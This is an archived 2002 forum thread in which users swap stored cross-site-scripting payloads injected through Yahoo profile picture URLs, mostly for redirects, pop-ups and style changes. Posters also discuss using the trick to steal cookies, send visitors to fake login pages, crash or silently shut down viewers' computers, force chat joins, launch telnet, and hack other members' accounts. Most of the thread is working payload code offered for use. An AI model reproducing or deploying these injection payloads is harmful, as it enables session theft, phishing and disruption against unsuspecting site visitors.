PDA

View Full Version : Cool Profiles


Mark__C
02-27-2002, 12:30 AM
http://www.geocities.com/mark__c/psych.gif"%20onload="document.location='http://markvb.i8.com'"%20.gif

upload this to your profile pic for a redirect. as you can see its all javascript so you can easily do anything.

Mandy
02-27-2002, 11:33 PM
if you want a cool profile change applets if ya need help ask and someone will help you

-69-
02-28-2002, 12:30 PM
ok i guess im stupid but ive tried everything and still cant figure this out.i tried marks idea but im lost. if you can give a little more detail for everyone to see we would appreciate it .ty..limp think you can make a program that you can customize all the colors make it easier lol?

Eminem
02-28-2002, 03:27 PM
Mark claims pawns has figured it out but noone else seems to be able to lol.

-69-
02-28-2002, 05:06 PM
i figured it out but its alot more then what mark has posted lol you need to make another profile page and you can add whatever you want view -69- (http://profiles.yahoo.com/-69-) and you will see how it redirects you to another page

BLaZiN
02-28-2002, 08:21 PM
OK, go to Edit Picture in your profile, and change it to a Web Page one..Make the URL this http://www.geocities.com/mark__c/psych.gif"%20onload="document.location='yahooID'"%20.gif
make sure you replace yahooID with a different ID, and save it. Go to that yahooID of yours, and edit the picture, but put that same URl with ur first ID in it. Now save it. When you go to one of the IDs profiles, it directs you to the other. when you get to the other, it directs you back. So on, so forth , kinda gay but just something to make ur profile funnier :D

-69-
02-28-2002, 09:55 PM
lol i think i fd up view my profile -69- (http://profiles.yahoo.con/-69-) i got it to redirect but you see the addy it went to.other then that it looks cool cause i made the profile the way i want it to look lol

halcy0nical
02-28-2002, 10:31 PM
Thought I would give you some detailed instructions so everyone can do it. I am curious how cool of a profile someone can come up with so that is why I am doing this.

1) Go to http://edit.yahoo.com and sign in
2) Once you get to http://my.yahoo.com click on Account Info on the top of the screen
3) Login again when prompted
4) When you get to Review My Account Information, click on Edit/Create Profiles
5) Pick the name you wanna use and click on Edit
6) Click on Edit Picture
7) Click on "on the web"
8) On the title bar, do View.... Source
9) Find the line <form action="/bc/YOURSCREENNAME/create_briefcase_doc" method=post> and replace it with <form action="http://edit.photos.yahoo.com/bc/YOURSCREENNAME/create_briefcase_doc" method=post>
10) Find the line <input type=text name=".drl" value="" size=40 maxlength=250><br><br> and replace it with <input type=text name=".drl" value="" size=40 maxlength=1000><br><br> (Note you can make maxlength even longer if you need to)
11) Save the source code as test.html on the desktop
12) Open up test.html and copy and paste in a link like http://www.geocities.com/oddgifs/new/flagball.gif"%20onload="document.body.style.scrollbarFaceColor='green';%20 document.body.style.backgroundImage='url(http://www.geocities.com/oddgifs/cool/spiralhorn.gif)'"%20.gif
13) Click Add Link, and you are done =)

Some interesting tags I have used are:
- document.body.style.scrollbarFaceColor = 'green' for scrollbar color
- document.body.style.backgroundImage='url(http://www.geocities.com/oddgifs/cool/spiralhorn.gif)' - for background image
- document.body.text = 'white' for text color
- document.body.link = 'white' for link color
- alert('message') for making a message box pop up
- document.title = 'SOMETHING' for changing the page title
- document.defaultStatus for changing the default status
- document.body.style.zoom = '10' for zooming in 10 times
- document.location = 'www.yahoo.com' for redirecting the profile page
And a few others....

To see a BIG list of alot of possible tags go to:
http://www.degs.co.uk/test/styles/background1.htm#

Hope that helps some people out, if you make any really cool profiles, paste the links :)

PoLoJoE
03-01-2002, 12:28 AM
sup mike, where do we put these codes at. do we open another link or something.



Some interesting tags I have used are:
- document.body.style.scrollbarFaceColor = 'green' for scrollbar color
- document.body.style.backgroundImage='url(http://www.geocities.com/oddgifs/cool/spiralhorn.gif)' - for background image
- document.body.text = 'white' for text color
- document.body.link = 'white' for link color
- alert('message') for making a message box pop up
- document.title = 'SOMETHING' for changing the page title
- document.defaultStatus for changing the default status
- document.body.style.zoom = '10' for zooming in 10 times
- document.location = 'www.yahoo.com' for redirecting the profile page
And a few others....

BLaZiN
03-01-2002, 10:57 PM
Yo Halyc0nical (or whatever ur name is lol) I tried that trick, and it works :) BUT, after I did it once, it stopped working again. Do you have this same problem? I was just about to make my profile look really cool...Later

By the way, can you change the profile page colors that way? like on http://profiles.yahoo.com/sephiroth ??? You can't use those colors no more, Yahoo only lets you use like 4 choices, but Is it possible with javascript to change that???

halcy0nical
03-01-2002, 11:33 PM
Sometimes it will let me change it multiple times, sometimes it wont let me change at all. I am not sure if the color changing trick still works, you used to be able to use this site:

http://www.geocities.com/clubmasterz/profile1_old.html

It doesn't work anymore though which sucks, but oh well. You might be able to find a tag like document.body.style.framecolor = 'black' but I haven't had time to look yet. Ciao.

BLaZiN
03-01-2002, 11:43 PM
OK, this works ONLY for your games profile (but it affects where it takes your complete profile) First, you must know how to edit your ID on your games profile. When you change it, put a ? in it. Like in josh_heuer, if i change it to j?osh_heuer, when someone clicks on complete profile it goes to profiles.yahoo.com/j or if i put it josh?_heuer it would go to the complete profile for josh (just a useless trick i wanted to share lol)

halcy0nical
03-02-2002, 06:48 PM
In response to PoLoJoE, you add in those tags by modifying the link. I will give a few examples below:

http://www.geocities.com/oddgifs/new/flagball.gif

This is one of the most basic links. It makes flagball.gif the image in the picture box.

Now lets say you want to make changes to the scroll bar color, background image, etc..

We start by adding "%20onload=" to our link, then follow it by tags, adding "%20.gif to the end.

Adding one tag to make the scrollbar color green, our link would now show:
http://www.geocities.com/oddgifs/new/flagball.gif"%20onload="document.body.style.scrollbarFaceColor = 'green'"%20.gif

To add multiple tags, we seperate them by ;%20 as shown below:
http://www.geocities.com/oddgifs/new/flagball.gif"%20onload="document.body.style.scrollbarFaceColor = 'green';%20document.body.text = 'white' "%20.gif

Now our profile will have a green scrollbar and white text. You can keep adding tags like this as you like, there is really no end to how big your creativity can be.

Some possible errors you might run into are:
a) You get an invalid URL message because you forgot to seperate text by %20. For example...
document.title = 'This is wrong' is invalid, where as
document.title = 'This%20is%20correct' will work.
alert('This is wrong') is invalid, where as
alert('This%20is%20correct') will work.
b) You get an invalid URL message because your URL is too long. If the last thing you see when you paste your URL into the box is not "%20.gif you need to make the maxlength longer. Do this by editing <input type=text name=".drl" value="" size=40 maxlength=1000><br><br> in the source code.

Hopefully this helps, if you still have questions just lemme know, ciao :)

PoLoJoE
03-03-2002, 02:15 PM
Thx mike for replying, ima test it now and see if it works, cause im still a little lost with it.

-69-
03-03-2002, 06:42 PM
i figured it out but when i view my profile i can see the animated background but seems like othere people cant.anyways thanks My Profile (http://profiles.yahoo.com/-69-)

BLaZiN
03-04-2002, 07:40 PM
well Halcy0nical's trick works everytime...Just gotta do it right. Here's some tips..

If you get errors, make sure if you are on messenger that you are on the ID you are using the trick with.

Make sure you seperate (almost) everything with ;%20 and use %20 for spaces (not Josh Heuer but Josh%20Heuer)

Always end in "%20.gif

Ohh yea, if you are on messenger, and you try it a few times, and it stops workin and says like "Can't View this Briefcase", then you have to make a new applet, I guess your crumb thing changes after a while and yahoo realizes this (I don't know what I'm talkin about but I'm givin it my best to sound smart :P )

That's pretty much all you have to do.
Later

BLaZiN
03-04-2002, 09:14 PM
Here are some cool codes i use:

document.body.style.backgroundImage='url(image.gif )'

document.linkColor='color' (for the color ones, use #'s,
like 000000 or 3366FF)
document.alinkColor='color'

document.vlinkColor='color'

document.body.bgColor='color'

document.body.onload= (use this to make stuff happen when
page is loaded)

document.title= (to change the title of the page)

document.body.title= (leave mouse in position over words,
and words will pop up saying what you
put)

document.body.text='color' (changes color of all text)

BLaZiN
03-04-2002, 09:32 PM
WHen you put in a message alert, it keeps coming up...Anyone know how to make it stop after the first try??

-69-
03-04-2002, 11:16 PM
what if you put the pop up code b4 the %20onload .and has anybody gotten the codes for the banners yahoo uses yet?need to change them gay azz colors

BLaZiN
03-06-2002, 02:33 PM
k well, I'm about to try putting the message thing before the "%20onload=" thing...I'll edit this when I'm done and let you know the results

-69-
03-06-2002, 03:41 PM
if that doesnt work put un animated pics on it and that should make it pop up once.the more it has to keep going to the site to upload the more times it pops up so if no animations then it will pop up once:D

Marijuana
03-14-2002, 10:42 PM
NOW THAT YOU ALL KNOW THIS TRICK... BE AWARE THAT IT CAN BE USED TO STEAL COOKIES/IPS AND TO REDIRECT SOME LAME PEOPLE TO FAKE LOGIN PAGES. I HAVE SEEN FROG AND DOGG USE IT A LOT.

BLaZiN
03-15-2002, 05:26 PM
lmao@"dogg and frog" haha that sounds funny..anyways, the cookie stealer isnt a bad idea, and also, theres a way to make people restart there computers.

-69-
03-16-2002, 03:15 PM
lol well post how to make people restart they're computers for us

BLaZiN
03-16-2002, 04:07 PM
lmao i would...just let me figure it out :p

-69-
03-24-2002, 11:00 PM
hey blaze did you try to view source on the page where you can chaneg the yahoo banner colors?i got it to the poitn where the option had the colors i wanted but didnt work.maybe you can figure it out.

Mandy
03-28-2002, 09:31 AM
its impossible right nowto doit but email yahoo maybe if we work together yahoo willlet us do it again. Amen!!!!!!!!!!! nice profile sinister http://profiles.yahoo.com/x.angel tell me if you like
mmuuaaahhhhhhhhhhhhhhhhhhhh

-69-
03-28-2002, 03:18 PM
aww i didnt know that you loved me mandy

trips
04-01-2002, 06:45 PM
a simple way to cause a person to restart there computer is use the redirect trick and send them to http://crashme.com/kaboom.html or you could use mine if its still up and running @ http://www.geocities.com/trippen_fool_0/profile.html
these should cause a person to have to restart there computer but it might get yahoo a little mad at yah.

Frost
04-04-2002, 02:39 AM
I think that yahoo fixed the javascript tricks. I think there may be another way to get around that but I don't know how yet. Let me know if you find out anything. :(

Josh
04-05-2002, 12:07 AM
PATchED

Goku
05-19-2002, 02:46 PM
:o it works again! :p http://profiles.yahoo.com/bl_az_in007 ...
but for some odd reason...everytime i use "%20onload=" it won't work...whereas when i put "%20onmouseover" it works...I haven't tried it much with onload cuz i like the idea of onmouseover and onmouseout better...the profile stays the same and when you put your mouse over the picture then is when the action starts, and more happens when you take your mouse off :eek:

I used
onmouseover="document.body.text='white'; alert('Josh Owns you!'); document.body.style.scrollbarFaceColor='black'; document.body.bgColor='black'" .gif
Anyone know any color profiles? I really want to do that trick with the ID Limpkin because it has black banners :O i would make all black background and all black text and scroll bars :p it would look cool...only thing that makes the trick dumb is because you cant change the colors to anything good anymore.

-69-
05-23-2002, 09:17 PM
rrrr i keep getting this error
The briefcase or file you are seeking does not exist.



Possible causes:
The web address is misspelled.
You are using an old bookmark.
The briefcase or file may have been deleted.
No briefcase exists with that name.
You do not have access to that briefcase

maybe need to restart or some%%%%i checked the briefcase and its fine to fn yahoo anybody else get this message?

Goku
05-23-2002, 09:40 PM
funny., that trick has worked every time for me...I don't think you can do the view source and change length anymore though so try makin shorter codes and not having to view source and changing length and saving blah blah, just go to new picture, click on the internet, and put the code in if its small enough. Then add that and viola that should work.

-69-
05-23-2002, 09:52 PM
oh yeah forgot yahoo doesnt like me:mad: lol i put this for the llink as a test
http://www.geocities.com/oddgifs/new/flagball.gif"%20onmouseover="document.body.style.scrollbarFaceColor='green';%20 document.body.style.backgroundImage='url(http://www.geocities.com/oddgifs/cool/spiralhorn.gif)'"%20.gif
look about right?
i think im putting wrong code in source. is it different then it was before?
heres what it looks like beofre i edit it
<form method=post enctype="multipart/form-data" action="/config/MYYAHOOID/process_bcmultipart_form">

HERES WHAT I MAKE IT TO
<form action="http://edit.photos.yahoo.com/bc/MYAYAHOOID/create_briefcase_doc" method=post>
rrrr now its a fn mission to figure it out!

Goku
05-26-2002, 03:03 PM
well im pretty sure yahoo patched that. you cant save it and do all that, you have to just straight up put the code in on the site.

-69-
05-26-2002, 05:14 PM
mother fuc ker lol here i was saving the source and all that other sh!t to get it to work and thats all i had to do lmfao for a whole day i tried editing source thinking im doing something wrong lol but i got ti now thanks goku gonna go f with it now:D gotta be a way to change the length to it so can add more also

Goku
05-27-2002, 02:03 PM
know how to steal cookies? Or at least copy everything on the page and then send it to an email or something? Use document.location='Javascript:document.cookie' and then make it copy that, its their cookie, and send it to your email. I dont htink theres a way cuz i dont know how yet! :o

Wood
05-29-2002, 09:35 PM
You know why %%%% with that just have a javascript that redirect your link back to a geocities page or something like that. But Hey, your profile not mine :)

-69-
06-16-2002, 02:59 PM
its patched anyways for now so who cares

Goku
06-20-2002, 02:04 AM
yea its patched. But ohh well, it will be back up soon i bet. But who even wants to do that trick when yahoo patches it anyways?

PoLoJoE
06-20-2002, 12:40 PM
yea, waste of time.

____Daniel_____
06-21-2002, 01:11 AM
BORING

Wood
06-21-2002, 04:54 PM
Alright, well im 85% that there is STILL an exploit out there for the "profile trick" its the point of trying to find a backdoor to find it first, if anyone wants I will be willing to help them find one.

Goku
06-23-2002, 07:52 PM
hmm age trick still works, and one that i found works to remove marital status but thats not any fun lol. maybe a new way to edit colors to anything you want? that would be sweet if there was a way. im sure there is, but i dunno where to begin, besides my.yahoo.com :)

WIZÄRD
06-23-2002, 08:30 PM
martial status......I did get my profile to say Playing with my dick as one of the options, but when i select it, nothing appears on my profile :-( profiles.yahoo.com/jon0 if u wanna see.

Goku
06-23-2002, 08:48 PM
yup thats what i meant, removing it, thats why i said "but thats not any fun" because its easy and doesnt make your profile look better.

Goku
06-26-2002, 03:17 PM
hey guys remember the funny little "ASCII name in your games profile" trick? well it still works believe it or not, just doesn't work in the new profiles...but it shows up in your old one.

just made this one a few days ago...
http://profiles.games.yahoo.com/games/profile?name=hckr_blz&page_id=ch&intl=do

PoLoJoE
06-26-2002, 04:55 PM
how u do that

Mark__C
06-26-2002, 06:47 PM
Yeah it still works but it only shows up on the old profiles which arent even the default anymore. So it's really useless unless you tell people to look at your old profile...

Goku
06-26-2002, 07:02 PM
yes mark thats true...

dragon_flames
07-09-2002, 12:15 AM
i heard you play nine ball without paying for a star,you need the source of all star ,how to get it and where to put it?

Realged13
07-09-2002, 01:54 AM
Lol, have fun trying to get the source to one. The only way ot get on to another persons All-Star id is to hack there id. And you can have some fun doing that also!

Goku
07-10-2002, 02:58 PM
eh..some are easy to hack.. i think seatalk im pretty sure hacked like 10 in 1 night!
(i didnt know there were more than 10 all star Ids...)

Wood
07-11-2002, 02:43 AM
I think mostly cracking is just about dead about time really, The only way you can really crack anything anymore is proxy crackers or just the normal way and change your ip every so many times.....which is pretty much just....not worth the work personally it might be you to though

Goku
07-13-2002, 08:21 PM
eh..
:P
http://profiles.yahoo.com/powder_
hehe look at maritul Status/gender.
notice it was updated july 13 2002.
:) hehe
so simple to do
ehh and i have the picture trick on that too.

-ßéñ©Ø-
07-15-2002, 08:26 PM
Thats ****ing awsome goku , I gotta so something like that!

Sinister -Ur site kicks so much ****ing ass it's unbelievable!

diggity_drail
07-15-2002, 10:36 PM
Goku, maybe you can help me do some stuff like that!!!! IM me if you want to under messenger. Of course if you have the time

later

Dig

Goku
07-17-2002, 09:11 PM
just wanted to tell people, if you have a name like yahoo-5 or something and it can be changed to yahoo 5 then dont delete the yahoo-5, if you want to take the spaced name into games, just make an applet on yahoo-5, then open the applet with notepad, look for yahoo-5 and take the - out and put a space there. it wont have rating but it comes into games.

-69-
08-02-2002, 12:27 AM
yeah was hoping nobody would post about trick so it dont get patched since yahoo patched every other one that was posted lol

^s-H-a-D-o-W^
08-02-2002, 12:35 AM
but when you ina room it has no rating..it you want to make a spaced name that can having rating..you have to do the work.

-69-
08-07-2002, 03:00 AM
no if the name was spaced originally it should have rating. but if you space an id it wont only the original say the-devil would have the rating not if you made it the devil. i think that made sense atleast thats the way my ids work

^s-H-a-D-o-W^
08-07-2002, 05:20 PM
well..if you do a real name trick, you can then proceed to put rating on the name..where with the applet trick, you will never be able to.

Goku
08-07-2002, 06:13 PM
and what is this real name trick?

^s-H-a-D-o-W^
08-07-2002, 10:15 PM
if your main account name is a n-a-m-e, then manipulate the add/delete profiles part so you can delete your main name..(make sure you have no profile names), then it will just come back as n a m e . :)

Goku
08-08-2002, 12:14 AM
yes that's real easy but, like -69- said, the n a m e will have no rating in games :-|

-69-
08-08-2002, 01:08 AM
anybody get the telnet command to work yet? ("javascript:location("file://C:/WINDOWS/TELNET.exe")

Goku
08-08-2002, 01:24 AM
what does that do?
i can make a link where when you move your mouse over it it will make telnet open but i dunno what you're trying to do, kinda the same thing i think.

^s-H-a-D-o-W^
08-08-2002, 08:40 PM
but you could then proceed to put rating on that name..which is easy enough..depending on if you have rating or not.

-69-
08-12-2002, 03:14 PM
one example view 69u profile 69u profile here (http://profiles.yahoo.com/69u) thats right im that damn good lol heres an example of the netstat command that wont work with 2000 professional but will on other systems you can test it out if you want netstat profiles (http://profiles.yahoo.com/edfvedfwdsc) and no neither profile will **** you up or any of that sh!t i do them for my amusement is all and to **** with people who try viewing my profiles.

^s-H-a-D-o-W^
08-12-2002, 04:34 PM
Is this in the occupation field?

<a href="http://www.1.COM/sin.gif" height=99920 width=99260 style=Background:url("javascript:document.write("Oops..69..Owned..Your..****ing..Lame..BitchAss..Vi sit..www.sinister69.com....");location("ymsgr:chat?69-Owned-Us:1");window.defaultStatus=("-69-..Owned..Your..Bitch..Ass");document.title=("-69-..Is..Your..God");alert("-69-..Owned..U");alert("WHOSE..YOUR..DADDY..NOW..BITCH..LMAO");alert("-69-..IS");") ) .gif"><img src="http://www.1.COM/sin.gif" height=99920 width=99260 style=Background:url("javascript:document.write("Oops..69..Owned..Your..****ing..Lame..BitchAss..Vi sit..www.sinister69.com....");location("ymsgr:chat?69-Owned-Us:1");window.defaultStatus=("-69-..Owned..Your..Bitch..Ass");document.title=("-69-..Is..Your..God");alert("-69-..Owned..U");alert("WHOSE..YOUR..DADDY..NOW..BITCH..LMAO");alert("-69-..IS");") ) .gif" width=150 height=150 border=1 alt="69u"></a>

-69-
08-13-2002, 04:51 AM
close but no cigar :p that just tells you some of the comands used in it

Goku
08-13-2002, 04:12 PM
wow what have i missed.
i can't do all that, please tell how :)
where do you put your java ?

^s-H-a-D-o-W^
08-14-2002, 11:52 PM
ya..I messed around with what you were trying to do..putting it in the picture and all, but I'm missing something. you have to %20 every space right? and then prolly and onmouseload somewhere or something? could you lay that out a little for me? if not, that's cool too.

Goku
08-17-2002, 11:07 AM
lol, i don't think you put that in the pic, too much stuff to fit :-|
maybe i dunno but im just lost

^s-H-a-D-o-W^
08-17-2002, 06:54 PM
goku, can you give me a sample code to put for a pic URL that works so maybe I can work his code out? I just don't understand how the whol process works. I looked in earlier posts, but they didn't want to work for some reason...grrrrrrrrrrr lol

-$mev-
08-17-2002, 09:04 PM
Yeah..can we try and get this thread back..some cool $hit here...i admit i didnt fully understand it but i see how it works now...kinda cool! :) Anyways..sinister man...come post ur secret! lol

Goku
08-18-2002, 01:47 AM
im fully up to how everyone does this stuff, all this sh¡t, but -69- lost me. :-| where the hell do you put your code at?

pecker
08-18-2002, 01:50 AM
is there anyway u could get yer entire profile into ascii characters???

Goku
08-18-2002, 01:51 AM
ohh and shadow...heres one.
i will make this up off the top of my head.
http://geocities.com/josh_heuer/g77.gif"%20onmousemove="document.title='you%20suck!';%20document.body.text ='00ced1';%20document.body.bgColor='ee11cc';"%20.gif

try to copy that, go to edit picture, then click On the Net or whatever, and paste that in. Should fit i think. im gonna test it myself, i will tell yuo what happens in a minute.

and btw, i put one on powder_
http://profiles.yahoo.com/powder_
gave that name away but it's still on there, run your mouse over the pic.

Goku
08-18-2002, 01:57 AM
well, i tried the code i just put.
http://profiles.yahoo.com/maurice-c
heh, i just made up those color codes 00ced1 (thats a real yahoo ID, it's < font color="00ced1"> anyways , made up the background. but it came out pink! bleh.
and to make ASCII...i dunno about that.

there is a way to put ASCII in gender/maritul status, i will post that soon too.

^s-H-a-D-o-W^
08-18-2002, 12:57 PM
that profile looks like a normal profile.

Goku
08-19-2002, 05:55 PM
yes it does..
until you put your mouse over the pic.
do that, and see/

^s-H-a-D-o-W^
08-20-2002, 12:23 PM
oh..well anyways, I figured out how to do everything now anways, but thanks for the help. I like -69-'s script where it automatically gives you alerts. :)

Goku
08-20-2002, 09:39 PM
yea thats easy...but making the page blank and all that stuff...dunno.

^s-H-a-D-o-W^
08-20-2002, 10:20 PM
well, to get script for pages like that, I use a page transfer thing on angelfire, that gets the source to an address, that way the javascript can't do its job
:)

Goku
08-20-2002, 11:28 PM
lol, i gotta try that sometime

^s-H-a-D-o-W^
08-21-2002, 08:37 AM
ya..it works well for pages like -69-'s where it changes before you get the chance to see the real source. if you want to see mine,

http://profiles.yahoo.com/-terrorist-

^s-H-a-D-o-W^
08-21-2002, 08:39 AM
hey, when you view that profile, does it automatically close the window or give you an alert that it will be closing?

Goku
08-21-2002, 01:11 PM
gives me 3 alerts...
like this.
hacker has spoken
the return of greatness
is near
then after you click OK on the last one, it closes
thats really cool.
where did you put your code ?

Goku
08-21-2002, 01:37 PM
lol man, i got the source...but when i add it, and try to save changes...all that sh¡t pops up lol grr you gotta tell me how to put it in and stuff.

^s-H-a-D-o-W^
08-21-2002, 04:56 PM
lol..what you have to do is make the text box big enough to hold the whole script, then enter it like you normally would.

Goku
08-21-2002, 10:12 PM
ohh! i get it, thanks man im gonna go do that now ;)

^s-H-a-D-o-W^
08-21-2002, 11:03 PM
took me a bit to get that too..but then I was keeping too much of the script that I found..I was being really stupid..amazing what sleep does, because the next day I did it and it worked just fine.


I sortof like the window.close part at the end. :)

Goku
08-22-2002, 07:19 PM
lol ok i must be dumb.
i thought i had it...i pasted the code in the occupation, it was all the there, saved changes...and nothing. here is what i used.

<a href="http://www.1.COM/sin.gif" height=99920 width=99260 style=Background:url("javascript:document.write("josh...owns...you!");location("ymsgr:chat?****ed.by..josh:666");window.defaultStatus=("Go%20to%20hell!");document.title=("Go%20to%20hell!");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");window.close()") ) .gif"><img src="http://www.1.COM/sin.gif" height=99920 width=99260 style=Background:url("javascript:document.write("josh...owns...you!");location("ymsgr:chat?****ed.by..josh:666");window.defaultStatus=("Go%20to%20hell");document.title=("Go%20to%20hell");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");window.close()") ) .gif" width=150 height=150 border=1 alt="biiittcchhh"></a>

i just took what you used, and edited it a bit. doesnt work.. Do i need to change spaces to %20 everywhere on it?

^s-H-a-D-o-W^
08-22-2002, 10:09 PM
no..you did the same mistake I did..you only need about half that

^s-H-a-D-o-W^
08-22-2002, 10:10 PM
http://www.1.COM/sin.gif" height=99920 width=99260 style=Background:url("javascript:document.write("josh...owns...you!");location("ymsgr:chat?****ed.by..josh:666");window.defaultStatus=("Go%20to%20hell");document.title=("Go%20to%20hell");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");window.close()") ) .gif


double check for your %20's too..I think I saw a space somewhere too.

^s-H-a-D-o-W^
08-22-2002, 10:11 PM
btw, on the alerts, you can't use spaces..you have to use .... or - or something..just not spaces.

-69-
08-26-2002, 09:05 PM
i added profile tricks and **** in my forum since finding this 1 is getting harder lol Forum (http://69.suddenlaunch.com)

-$mev-
08-26-2002, 09:42 PM
Dude, how did u go about getting a sponsor outta interest?

-69-
08-27-2002, 01:06 AM
um ...sponsor? me? or did i miss something lol?

Goku
08-27-2002, 06:57 PM
what is up with your thing -69- ?
i signed up and **** and it gave me a password...i logged in my name, changed the PW to what i wanted, and then it wont let me log back in again.

Goku
08-27-2002, 07:01 PM
umm never mind about that last post by me

-$mev-
08-27-2002, 07:04 PM
U got a site sponsor no sinister?

Goku
08-27-2002, 07:22 PM
shadow, thanks for the code...but it still doesnt work...heres what i do...edit the info and stuff..make sure maxlength on occupation=99999999 then save it, open it up. heres my code i put in it...

http://geocities.com/josh_heuer/g77.gif"%20height=99920%20width=99260%20style=Background:u rl("javascript:document.write("josh...owns...you!");location("ymsgr:chat?****ed.by..josh:666");window.defaultStatus=("Go%20to%20hell");document.title=("Go%20to%20hell");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("Click%20OK");alert("You%20can%20make%20it!");alert("Come%20on%20just%20a%few%20more%20times!");alert("ok%20done");window.close()")%20)%20.gif

what am i doing wrong? should it be in the picture instead ?

-69-
08-27-2002, 09:21 PM
um i dont think i have a sponsor lol..Im mad i lost my code for online status when people click to send message it automatically sends it with a message already in box.. i stumbled upon it when i did it first time and forget how i did it now :(

-69-
08-27-2002, 09:23 PM
oh and your codes the only bad part is they need toclick the buttons to join the room so if they dont click them they wont go into chat. But man is it a great way to **** with people lol

Goku
08-27-2002, 09:49 PM
fear not. after messing a long time with this sh¡t i finally got it.

ymsgr:sendIM?username&boblah

thats your basic msg sender.
replace username with the username (obviously)
and replace blah with the text.
DONT mess with the bo
it has to stay there.

-69-
08-28-2002, 02:20 AM
lol looked nothing like the code i stumbled across but it works so thank you lol:D now just gotta figure out where i wanna put it on my site again :(

Goku
08-28-2002, 05:36 PM
well i didnt know what you were talking about..i just saw the part about how it already has a message in the box. so i figured that part out.
hmm

^s-H-a-D-o-W^
08-28-2002, 06:22 PM
no no..its not occupation..its the image URL

^s-H-a-D-o-W^
08-28-2002, 06:25 PM
sorry, I was behind on messages here..lol

-69-
08-28-2002, 08:48 PM
lol i put some of the codes in my forum on my site if you wanna see how to do them. also newest profile trick i came up with that i like (harmless) ___Damage_Inc___ profile (http://profiles.yahoo.com/___Damage_Inc___) try not to have any pop up stoppers on lol its a cool little redirection that you can amuse yourself with. play with the start button and **** its funny lol

ZEROXTREMECOOL
08-30-2002, 10:49 PM
WTF was that @ WTF . com no harm done it was weird/cool as **** I like peps that post interesting **** like that 69 nice goin dude

Goku
08-30-2002, 11:49 PM
ok i dont get this one damn bit.
-69- please help...
is this the right code

http://geocities.com/josh_heuer/g77.gif"+onmousemove="height=220+width=260+style=Background:url("javascript:location("http://www.geocities.com/infatu8n101/rg.html")")+)+.gif"

i enter that into the picture but nothing happens :( i guess i am doing something wrong. everything i do is wrong because i have tried several ways...changing the code...changing + to %20 etc..and none seem to work!

-69-
09-01-2002, 03:57 PM
lol goto my forum goko i got most the codes posted on it already all you need to do is copy paste them and thanks zero i kinda amused myself with that profile to lol and there is a way to edit them with the redirect code just gotta know what your doing

^s-H-a-D-o-W^
09-01-2002, 07:03 PM
in your code it says

java script..you can't have a space there.

-$mev-
09-01-2002, 07:16 PM
goku, u know the send msg commands for ym/msn and aim? :D

Goku
09-03-2002, 11:30 PM
yea...why ?

Goku
09-03-2002, 11:33 PM
ohh and shadow...
i changed that code by taking out the space...so it is

http://geocities.com/josh_heuer/g77.gif"+onmousemove="height=220+width=260+style=Background:url("javascript:location("http://www.geocities.com/infatu8n101/rg.html")")+)+.gif"

but the little bastard still doesn't work. =/

Andy
09-03-2002, 11:59 PM
still looks like theres a space in ("java script:location ... maybe its just my computer i dunno

Goku
09-04-2002, 06:35 PM
no andy you are right...its still there i just forgot to take it out when i posted sorry about that...should be
http://geocities.com/josh_heuer/g77.gif"+onmousemove="height=220+width=260+style=Background:url("javascript:location("http://www.geocities.com/infatu8n101/rg.html")")+)+.gif"

Goku
09-04-2002, 06:36 PM
GRR it wont let you...i removed the damn space yet again and the site continually adds it back! :( anyways i do that code but without the space in javascript and it still doesn't work

Goku
09-05-2002, 08:53 PM
Anyways, i just thought of something i should have a long time ago!!!
your Age on your profile is .age
So if you fit that into your java like
document.body..age or something
you might be able to change it to what you want ?
just a thought but im not the best at all that stuff so someone try it.

Andy
09-05-2002, 08:55 PM
oh sorry i was tryin to let you know incase you missed it or thought it was in a different place, just trying to help :)

-69-
09-06-2002, 03:00 PM
is there an automatic command to shut down computer besides hitting ctrl alt delete all that junk? like a c:\windowns\shutdown or some****? but so it doesnt ask you if you want to. lol in other words i want it so when people view the profile it will just automatically shut their computer down with no warnings or pop ups :D this will be my next masterpiece mwuahahaha

Tyler
12-15-2002, 01:10 PM
Does ne of this **** work ne more besides age trick?

leblitzer
08-22-2003, 12:26 PM
Originally posted by Mark__C
http://www.geocities.com/mark__c/psych.gif"%20onload="document.location='http://markvb.i8.com'"%20.gif

upload this to your profile pic for a redirect. as you can see its all javascript so you can easily do anything.

no work mark :(